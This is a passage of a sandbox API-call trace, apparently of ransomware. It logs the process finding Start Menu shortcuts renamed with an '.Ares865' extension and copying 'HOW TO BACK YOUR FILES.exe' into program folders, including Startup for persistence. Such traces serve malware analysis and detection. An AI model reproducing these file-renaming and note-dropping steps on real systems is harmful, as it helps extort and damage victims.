lstrlenW (lpString="Ares865") returned 7 [0090.401] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.402] lstrcpyW (in: lpString1=0x2cce492, lpString2="SharePoint" | out: lpString1="SharePoint") returned="SharePoint" [0090.402] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a08 [0090.402] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa8) returned 0x2e2710 [0090.402] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a10 | out: ListHead=0x2e7710, ListEntry=0x2e7a10) returned 0x2e79f0 [0090.402] lstrcpyW (in: lpString1=0x2cce492, lpString2="Sidebar.lnk.Ares865" | out: lpString1="Sidebar.lnk.Ares865") returned="Sidebar.lnk.Ares865" [0090.402] lstrlenW (lpString="Sidebar.lnk.Ares865") returned 19 [0090.402] lstrlenW (lpString="Ares865") returned 7 [0090.402] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.402] lstrcpyW (in: lpString1=0x2cce492, lpString2="Startup" | out: lpString1="Startup") returned="Startup" [0090.402] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a28 [0090.402] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa2) returned 0x2e27c0 [0090.402] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a30 | out: ListHead=0x2e7710, ListEntry=0x2e7a30) returned 0x2e7a10 [0090.402] lstrcpyW (in: lpString1=0x2cce492, lpString2="Tablet PC" | out: lpString1="Tablet PC") returned="Tablet PC" [0090.402] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a48 [0090.402] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa6) returned 0x2e2870 [0090.402] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a50 | out: ListHead=0x2e7710, ListEntry=0x2e7a50) returned 0x2e7a30 [0090.402] lstrcpyW (in: lpString1=0x2cce492, lpString2="Windows Anytime Upgrade.lnk.Ares865" | out: lpString1="Windows Anytime Upgrade.lnk.Ares865") returned="Windows Anytime Upgrade.lnk.Ares865" [0090.402] lstrlenW (lpString="Windows Anytime Upgrade.lnk.Ares865") returned 35 [0090.402] lstrlenW (lpString="Ares865") returned 7 [0090.402] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.402] lstrcpyW (in: lpString1=0x2cce492, lpString2="Windows DVD Maker.lnk.Ares865" | out: lpString1="Windows DVD Maker.lnk.Ares865") returned="Windows DVD Maker.lnk.Ares865" [0090.402] lstrlenW (lpString="Windows DVD Maker.lnk.Ares865") returned 29 [0090.402] lstrlenW (lpString="Ares865") returned 7 [0090.402] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.403] lstrcpyW (in: lpString1=0x2cce492, lpString2="Windows Fax and Scan.lnk.Ares865" | out: lpString1="Windows Fax and Scan.lnk.Ares865") returned="Windows Fax and Scan.lnk.Ares865" [0090.403] lstrlenW (lpString="Windows Fax and Scan.lnk.Ares865") returned 32 [0090.403] lstrlenW (lpString="Ares865") returned 7 [0090.403] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.403] lstrcpyW (in: lpString1=0x2cce492, lpString2="Windows Media Player.lnk.Ares865" | out: lpString1="Windows Media Player.lnk.Ares865") returned="Windows Media Player.lnk.Ares865" [0090.403] lstrlenW (lpString="Windows Media Player.lnk.Ares865") returned 32 [0090.403] lstrlenW (lpString="Ares865") returned 7 [0090.403] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.403] lstrcpyW (in: lpString1=0x2cce492, lpString2="XPS Viewer.lnk.Ares865" | out: lpString1="XPS Viewer.lnk.Ares865") returned="XPS Viewer.lnk.Ares865" [0090.403] lstrlenW (lpString="XPS Viewer.lnk.Ares865") returned 22 [0090.403] lstrlenW (lpString="Ares865") returned 7 [0090.403] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.403] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Tablet PC", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Tablet PC") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Tablet PC" [0090.403] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Tablet PC" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Tablet PC") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Tablet PC" [0090.403] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.403] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Tablet PC\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\start menu\\programs\\tablet pc\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.404] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.404] GetLastError () returned 0x0 [0090.404] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.404] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.404] CloseHandle (hObject=0x120) returned 1 [0090.404] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.404] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Tablet PC\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x4bb59600, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bb59600, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.405] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.405] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.405] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Startup", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Startup") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Startup" [0090.405] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Startup" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Startup") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Startup" [0090.405] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.405] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Startup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\start menu\\programs\\startup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.405] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.406] GetLastError () returned 0x0 [0090.406] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.406] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.406] CloseHandle (hObject=0x120) returned 1 [0090.406] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.406] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x595bf880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x595bf880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.407] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.407] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.407] lstrcpyW (in: lpString1=0x2cce4a2, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0090.407] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0090.407] lstrlenW (lpString="Ares865") returned 7 [0090.407] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.407] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\SharePoint", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\SharePoint") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\SharePoint" [0090.407] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\SharePoint" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\SharePoint") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\SharePoint" [0090.407] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.407] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\SharePoint\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\start menu\\programs\\sharepoint\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.408] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.408] GetLastError () returned 0x0 [0090.408] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.408] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.408] CloseHandle (hObject=0x120) returned 1 [0090.408] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.408] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\SharePoint\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78038410, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x595e59e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x595e59e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.408] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.408] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.409] lstrcpyW (in: lpString1=0x2cce4a8, lpString2="Microsoft SharePoint Workspace 2010.lnk.Ares865" | out: lpString1="Microsoft SharePoint Workspace 2010.lnk.Ares865") returned="Microsoft SharePoint Workspace 2010.lnk.Ares865" [0090.409] lstrlenW (lpString="Microsoft SharePoint Workspace 2010.lnk.Ares865") returned 47 [0090.409] lstrlenW (lpString="Ares865") returned 7 [0090.409] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.409] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office" [0090.409] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office" [0090.409] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.409] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\start menu\\programs\\microsoft office\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.409] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.410] GetLastError () returned 0x0 [0090.410] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.410] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.410] CloseHandle (hObject=0x120) returned 1 [0090.410] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.410] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77f53bd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x596f0380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x596f0380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.410] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.410] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.410] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="Microsoft Access 2010.lnk.Ares865" | out: lpString1="Microsoft Access 2010.lnk.Ares865") returned="Microsoft Access 2010.lnk.Ares865" [0090.410] lstrlenW (lpString="Microsoft Access 2010.lnk.Ares865") returned 33 [0090.410] lstrlenW (lpString="Ares865") returned 7 [0090.410] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.411] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="Microsoft Excel 2010.lnk.Ares865" | out: lpString1="Microsoft Excel 2010.lnk.Ares865") returned="Microsoft Excel 2010.lnk.Ares865" [0090.411] lstrlenW (lpString="Microsoft Excel 2010.lnk.Ares865") returned 32 [0090.411] lstrlenW (lpString="Ares865") returned 7 [0090.411] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.411] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="Microsoft InfoPath Designer 2010.lnk.Ares865" | out: lpString1="Microsoft InfoPath Designer 2010.lnk.Ares865") returned="Microsoft InfoPath Designer 2010.lnk.Ares865" [0090.411] lstrlenW (lpString="Microsoft InfoPath Designer 2010.lnk.Ares865") returned 44 [0090.411] lstrlenW (lpString="Ares865") returned 7 [0090.411] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.411] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="Microsoft InfoPath Filler 2010.lnk.Ares865" | out: lpString1="Microsoft InfoPath Filler 2010.lnk.Ares865") returned="Microsoft InfoPath Filler 2010.lnk.Ares865" [0090.411] lstrlenW (lpString="Microsoft InfoPath Filler 2010.lnk.Ares865") returned 42 [0090.411] lstrlenW (lpString="Ares865") returned 7 [0090.411] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.411] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="Microsoft Office 2010 Tools" | out: lpString1="Microsoft Office 2010 Tools") returned="Microsoft Office 2010 Tools" [0090.411] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79e8 [0090.411] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xec) returned 0x2d6cf0 [0090.411] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79f0 | out: ListHead=0x2e7710, ListEntry=0x2e79f0) returned 0x2e7790 [0090.411] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="Microsoft OneNote 2010.lnk.Ares865" | out: lpString1="Microsoft OneNote 2010.lnk.Ares865") returned="Microsoft OneNote 2010.lnk.Ares865" [0090.411] lstrlenW (lpString="Microsoft OneNote 2010.lnk.Ares865") returned 34 [0090.411] lstrlenW (lpString="Ares865") returned 7 [0090.411] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.411] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="Microsoft Outlook 2010.lnk.Ares865" | out: lpString1="Microsoft Outlook 2010.lnk.Ares865") returned="Microsoft Outlook 2010.lnk.Ares865" [0090.411] lstrlenW (lpString="Microsoft Outlook 2010.lnk.Ares865") returned 34 [0090.411] lstrlenW (lpString="Ares865") returned 7 [0090.411] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.412] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="Microsoft PowerPoint 2010.lnk.Ares865" | out: lpString1="Microsoft PowerPoint 2010.lnk.Ares865") returned="Microsoft PowerPoint 2010.lnk.Ares865" [0090.412] lstrlenW (lpString="Microsoft PowerPoint 2010.lnk.Ares865") returned 37 [0090.412] lstrlenW (lpString="Ares865") returned 7 [0090.412] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.412] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="Microsoft Project 2010.lnk.Ares865" | out: lpString1="Microsoft Project 2010.lnk.Ares865") returned="Microsoft Project 2010.lnk.Ares865" [0090.412] lstrlenW (lpString="Microsoft Project 2010.lnk.Ares865") returned 34 [0090.412] lstrlenW (lpString="Ares865") returned 7 [0090.412] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.412] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="Microsoft Publisher 2010.lnk.Ares865" | out: lpString1="Microsoft Publisher 2010.lnk.Ares865") returned="Microsoft Publisher 2010.lnk.Ares865" [0090.412] lstrlenW (lpString="Microsoft Publisher 2010.lnk.Ares865") returned 36 [0090.412] lstrlenW (lpString="Ares865") returned 7 [0090.412] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.412] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="Microsoft SharePoint Workspace 2010.lnk.Ares865" | out: lpString1="Microsoft SharePoint Workspace 2010.lnk.Ares865") returned="Microsoft SharePoint Workspace 2010.lnk.Ares865" [0090.412] lstrlenW (lpString="Microsoft SharePoint Workspace 2010.lnk.Ares865") returned 47 [0090.412] lstrlenW (lpString="Ares865") returned 7 [0090.412] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.412] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="Microsoft Visio 2010.lnk.Ares865" | out: lpString1="Microsoft Visio 2010.lnk.Ares865") returned="Microsoft Visio 2010.lnk.Ares865" [0090.412] lstrlenW (lpString="Microsoft Visio 2010.lnk.Ares865") returned 32 [0090.412] lstrlenW (lpString="Ares865") returned 7 [0090.412] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.412] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="Microsoft Word 2010.lnk.Ares865" | out: lpString1="Microsoft Word 2010.lnk.Ares865") returned="Microsoft Word 2010.lnk.Ares865" [0090.412] lstrlenW (lpString="Microsoft Word 2010.lnk.Ares865") returned 31 [0090.412] lstrlenW (lpString="Ares865") returned 7 [0090.412] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.413] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools" [0090.413] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools" [0090.413] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.413] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.413] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.413] GetLastError () returned 0x0 [0090.414] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.414] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.414] CloseHandle (hObject=0x120) returned 1 [0090.414] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.414] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77f53bd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x59788900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x59788900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.414] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.414] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.414] lstrcpyW (in: lpString1=0x2cce4ec, lpString2="Digital Certificate for VBA Projects.lnk.Ares865" | out: lpString1="Digital Certificate for VBA Projects.lnk.Ares865") returned="Digital Certificate for VBA Projects.lnk.Ares865" [0090.414] lstrlenW (lpString="Digital Certificate for VBA Projects.lnk.Ares865") returned 48 [0090.414] lstrlenW (lpString="Ares865") returned 7 [0090.414] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.414] lstrcpyW (in: lpString1=0x2cce4ec, lpString2="Microsoft Clip Organizer.lnk.Ares865" | out: lpString1="Microsoft Clip Organizer.lnk.Ares865") returned="Microsoft Clip Organizer.lnk.Ares865" [0090.414] lstrlenW (lpString="Microsoft Clip Organizer.lnk.Ares865") returned 36 [0090.414] lstrlenW (lpString="Ares865") returned 7 [0090.414] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.415] lstrcpyW (in: lpString1=0x2cce4ec, lpString2="Microsoft Office 2010 Language Preferences.lnk.Ares865" | out: lpString1="Microsoft Office 2010 Language Preferences.lnk.Ares865") returned="Microsoft Office 2010 Language Preferences.lnk.Ares865" [0090.415] lstrlenW (lpString="Microsoft Office 2010 Language Preferences.lnk.Ares865") returned 54 [0090.415] lstrlenW (lpString="Ares865") returned 7 [0090.415] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.415] lstrcpyW (in: lpString1=0x2cce4ec, lpString2="Microsoft Office 2010 Upload Center.lnk.Ares865" | out: lpString1="Microsoft Office 2010 Upload Center.lnk.Ares865") returned="Microsoft Office 2010 Upload Center.lnk.Ares865" [0090.415] lstrlenW (lpString="Microsoft Office 2010 Upload Center.lnk.Ares865") returned 47 [0090.415] lstrlenW (lpString="Ares865") returned 7 [0090.415] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.415] lstrcpyW (in: lpString1=0x2cce4ec, lpString2="Microsoft Office Picture Manager.lnk.Ares865" | out: lpString1="Microsoft Office Picture Manager.lnk.Ares865") returned="Microsoft Office Picture Manager.lnk.Ares865" [0090.415] lstrlenW (lpString="Microsoft Office Picture Manager.lnk.Ares865") returned 44 [0090.415] lstrlenW (lpString="Ares865") returned 7 [0090.415] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.415] lstrcpyW (in: lpString1=0x2cce4ec, lpString2="Microsoft Project Server 2010 Accounts.lnk.Ares865" | out: lpString1="Microsoft Project Server 2010 Accounts.lnk.Ares865") returned="Microsoft Project Server 2010 Accounts.lnk.Ares865" [0090.415] lstrlenW (lpString="Microsoft Project Server 2010 Accounts.lnk.Ares865") returned 50 [0090.415] lstrlenW (lpString="Ares865") returned 7 [0090.415] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") 